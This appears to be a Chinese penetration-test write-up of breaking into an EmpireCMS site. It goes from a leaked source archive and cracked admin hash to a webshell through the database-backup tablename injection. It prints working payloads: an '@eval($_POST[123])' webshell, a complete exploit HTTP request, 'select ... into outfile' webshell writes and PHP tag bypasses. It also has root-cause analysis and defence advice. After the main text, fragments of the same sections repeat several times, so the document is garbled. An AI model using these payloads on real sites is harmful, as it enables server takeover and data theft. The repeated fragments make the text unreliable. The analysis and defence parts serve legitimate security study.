EmpireCMS 源码泄露到GetShell漏洞分析与利用<\/h1>

1. 漏洞背景<\/h2>
本文档详细分析EmpireCMS从源码泄露到最终获取服务器权限的全过程。所有漏洞均已提交至漏洞平台，且恶意操作已复原。<\/p>

2. 信息收集阶段<\/h2>

2.1 源码泄露<\/h3>

通过访问 http:\/\/www.xxx.com.cn\/www.zip<\/code> 获取网站源码<\/p>

敏感信息搜索技巧<\/strong>：<\/p>


使用关键词搜索源码：key<\/code>、pwd<\/code>、passwd<\/code>、password<\/code><\/li>
检查robots.txt<\/code>文件，发现CMS信息为EmpireCMS<\/li>
<\/ul>
2.2 数据库信息获取<\/h3>

查询EmpireCMS数据表结构，管理员表为phome_enewsuser<\/code><\/li>
在源码中全局搜索该表名，发现敏感信息泄露<\/li>
获取管理员用户名、密码hash和盐值<\/li>
解密MD5得到管理员凭证：Kite\/kite<\/code><\/li>
<\/ol>
2.3 后台地址发现<\/h3>

默认后台地址：http:\/\/www.xxx.com.cn\/e\/admin\/<\/code><\/li>
确认版本号为6.6<\/li>
<\/ul>
3. 漏洞利用尝试<\/h2>
3.1 尝试1：JS调用登陆模版GetShell<\/h3>
漏洞位置<\/strong>：后台-模版-公共模版-js调用登陆模版<\/p>
失败原因<\/strong>：Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist<\/code>，相关表被删除<\/p>
3.2 尝试2：导入数据库模型GetShell<\/h3>
漏洞详情<\/strong>：<\/p>

EmpireCMS 7.5及之前版本中e\/class\/moddofun.php<\/code>文件的LoadInMod<\/code>函数存在安全漏洞<\/li>
可上传任意.mod<\/code>文件实现文件上传<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

创建test.php.mod<\/code>文件，内容为PHP代码<\/li>
在后台"数据表与系统模型"中选择导入<\/li>
<\/ol>
失败原因<\/strong>：表不存在错误<\/p>
3.3 尝试3：执行SQL语句GetShell<\/h3>
漏洞详情<\/strong>：<\/p>

EmpireCMS7.5及之前版本中admindbDoSql.php<\/code>存在代码注入漏洞<\/li>
需要MySQL配置secure_file_priv<\/code>不当<\/li>
<\/ul>
利用Payload<\/strong>：<\/p>
select<\/span> '<?php @eval($_POST[123])?>'<\/span> into<\/span> outfile '绝对路径\/e\/admin\/lyy.php'<\/span>
<\/span><\/span><\/code><\/pre>失败原因<\/strong>：无法获取绝对路径，无回显执行<\/p>
3.4 成功利用：备份数据GetShell<\/h3>
漏洞详情<\/strong>：<\/p>

EmpireCMS 7.5及之前版本在后台备份数据库时未验证数据库表名<\/li>
通过修改数据库表名可实现任意代码执行<\/li>
<\/ul>
利用步骤<\/strong>：<\/p>

选择任意表开始备份并抓包<\/li>
修改tablename<\/code>字段为Payload：
@eval($_POST[123])
<\/code><\/pre>
<\/li>
<\/ol>
完整请求示例<\/strong>：<\/p>
POST<\/span> \/e\/admin\/ebak\/phome.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> www.xxx.com.cn<\/span>
<\/span><\/span>Content-Length:<\/span> 285<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Cookie:<\/span> [管理员Cookie]<\/span>
<\/span><\/span>
<\/span><\/span>phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename[]=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD
<\/span><\/span><\/code><\/pre>
从回显获取备份文件夹名（如hdm1010482_db_20211229152350<\/code>）<\/li>
访问Webshell：
http:\/\/www.xxx.cn\/e\/admin\/ebak\/bdata\/hdm1010482_db_20211229152350\/config.php
<\/code><\/pre>
<\/li>
<\/ol>
4. 漏洞原理分析<\/h2>
4.1 漏洞位置<\/h3>
e\/admin\/ebak\/class\/functions.php<\/code>文件中的Ebak_DoEbak<\/code>函数存在文件写入操作<\/p>
4.2 关键代码<\/h3>
$string=<\/span>"<?php
<\/span><\/span><\/span><\/span>\$<\/span>b_table=<\/span>\"<\/span>"<\/span>.<\/span>$b_table.<\/span>"<\/span>\"<\/span>;
<\/span><\/span><\/span>"<\/span>.<\/span>$d_table.<\/span>"
<\/span><\/span><\/span><\/span>\$<\/span>b_baktype="<\/span>.<\/span>$add['baktype'<\/span>].<\/span>";
<\/span><\/span><\/span><\/span>\$<\/span>b_filesize="<\/span>.<\/span>$add['filesize'<\/span>].<\/span>";
<\/span><\/span><\/span>[...其他变量...]
<\/span><\/span><\/span>?>"<\/span>;
<\/span><\/span>
<\/span><\/span>$cfile=<\/span>$bakpath.<\/span>"\/"<\/span>.<\/span>$add['mypath'<\/span>].<\/span>"\/config.php"<\/span>;
<\/span><\/span>WriteFiletext_n<\/span>($cfile,$string);
<\/span><\/span><\/code><\/pre>4.3 漏洞成因<\/h3>

$d_table<\/code>变量直接拼接进PHP文件内容，无任何过滤<\/li>
$d_table<\/code>来自POST参数tablename<\/code>，攻击者可完全控制<\/li>
其他参数或被双引号包裹，或被强制转换为int类型，无法利用<\/li>
<\/ol>
5. 其他利用尝试<\/h2>
5.1 SQL写入Webshell<\/h3>
在获取绝对路径后尝试：<\/p>
select<\/span> '<?php phpinfo();?>'<\/span> into<\/span> outfile '\/data\/home\/hmu072095\/htdocs\/e\/admin\/lyy.php'<\/span>
<\/span><\/span><\/code><\/pre>结果<\/strong>：<\/p>

语句执行成功但内容被替换为空<\/li>
可写入普通文本文件<\/li>
PHP标签被过滤<\/li>
<\/ul>
5.2 绕过尝试<\/h3>

使用空格分隔：<? phpinfo(); ?><\/code> - 失败<\/li>
使用script标签：<script language="php">phpinfo();<\/script><\/code> - 写入但无法执行<\/li>
ASP风格标签：<% phpinfo(); %><\/code> - 写入但服务器不支持<\/li>
<\/ol>
6. 总结与防御建议<\/h2>
6.1 漏洞总结<\/h3>

通过源码泄露获取敏感信息<\/li>
利用历史漏洞进行渗透<\/li>
最终通过备份功能未过滤表名实现代码执行<\/li>
<\/ul>
6.2 防御建议<\/h3>


防止源码泄露<\/strong>：<\/p>

删除开发环境备份文件<\/li>
配置服务器禁止访问.zip等压缩文件<\/li>
<\/ul>
<\/li>

加固EmpireCMS<\/strong>：<\/p>

升级到最新版本<\/li>
修改默认后台路径<\/li>
过滤备份功能中的表名参数<\/li>
<\/ul>
<\/li>

数据库安全<\/strong>：<\/p>

配置MySQL的secure_file_priv<\/code>为安全值<\/li>
使用最小权限原则设置数据库用户<\/li>
<\/ul>
<\/li>

服务器配置<\/strong>：<\/p>

禁用危险函数<\/li>
配置PHP禁用短标签<\/li>
<\/ul>
<\/li>

监控与日志<\/strong>：<\/p>

监控异常备份操作<\/li>
定期审计日志文件<\/li>
<\/ul>
<\/li>
<\/ol>

EmpireCMS 源码泄露到GetShell漏洞分析与利用<\/h1>

1. 漏洞背景<\/h2>
本文档详细分析EmpireCMS从源码泄露到最终获取服务器权限的全过程。所有漏洞均已提交至漏洞平台，且恶意操作已复原。<\/p>

2. 信息收集阶段<\/h2>

3. 漏洞利用尝试<\/h2>

3.1 尝试1：JS调用登陆模版GetShell<\/h3>
漏洞位置<\/strong>：后台-模版-公共模版-js调用登陆模版<\/p>
失败原因<\/strong>：`Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist<\/code>，相关表被删除<\/p>`

4. 漏洞原理分析<\/h2>

4.1 漏洞位置<\/h3>
`e\/admin\/ebak\/class\/functions.php<\/code>文件中的Ebak_DoEbak<\/code>函数存在文件写入操作<\/p>`

5. 其他利用尝试<\/h2>

6. 总结与防御建议<\/h2>

EmpireCMS 源码泄露到GetShell漏洞分析与利用<\/h1>

1. 漏洞背景<\/h2> 本文档详细分析EmpireCMS从源码泄露到最终获取服务器权限的全过程。所有漏洞均已提交至漏洞平台，且恶意操作已复原。<\/p>

2. 信息收集阶段<\/h2>

3. 漏洞利用尝试<\/h2>

3.1 尝试1：JS调用登陆模版GetShell<\/h3> 漏洞位置<\/strong>：后台-模版-公共模版-js调用登陆模版<\/p> 失败原因<\/strong>：Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist<\/code>，相关表被删除<\/p>

4. 漏洞原理分析<\/h2>

4.1 漏洞位置<\/h3> e\/admin\/ebak\/class\/functions.php<\/code>文件中的Ebak_DoEbak<\/code>函数存在文件写入操作<\/p>

5. 其他利用尝试<\/h2>

6. 总结与防御建议<\/h2>

1. 漏洞背景<\/h2>
本文档详细分析EmpireCMS从源码泄露到最终获取服务器权限的全过程。所有漏洞均已提交至漏洞平台，且恶意操作已复原。<\/p>

3.1 尝试1：JS调用登陆模版GetShell<\/h3>
漏洞位置<\/strong>：后台-模版-公共模版-js调用登陆模版<\/p>
失败原因<\/strong>：`Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist<\/code>，相关表被删除<\/p>`

4.1 漏洞位置<\/h3>
`e\/admin\/ebak\/class\/functions.php<\/code>文件中的Ebak_DoEbak<\/code>函数存在文件写入操作<\/p>`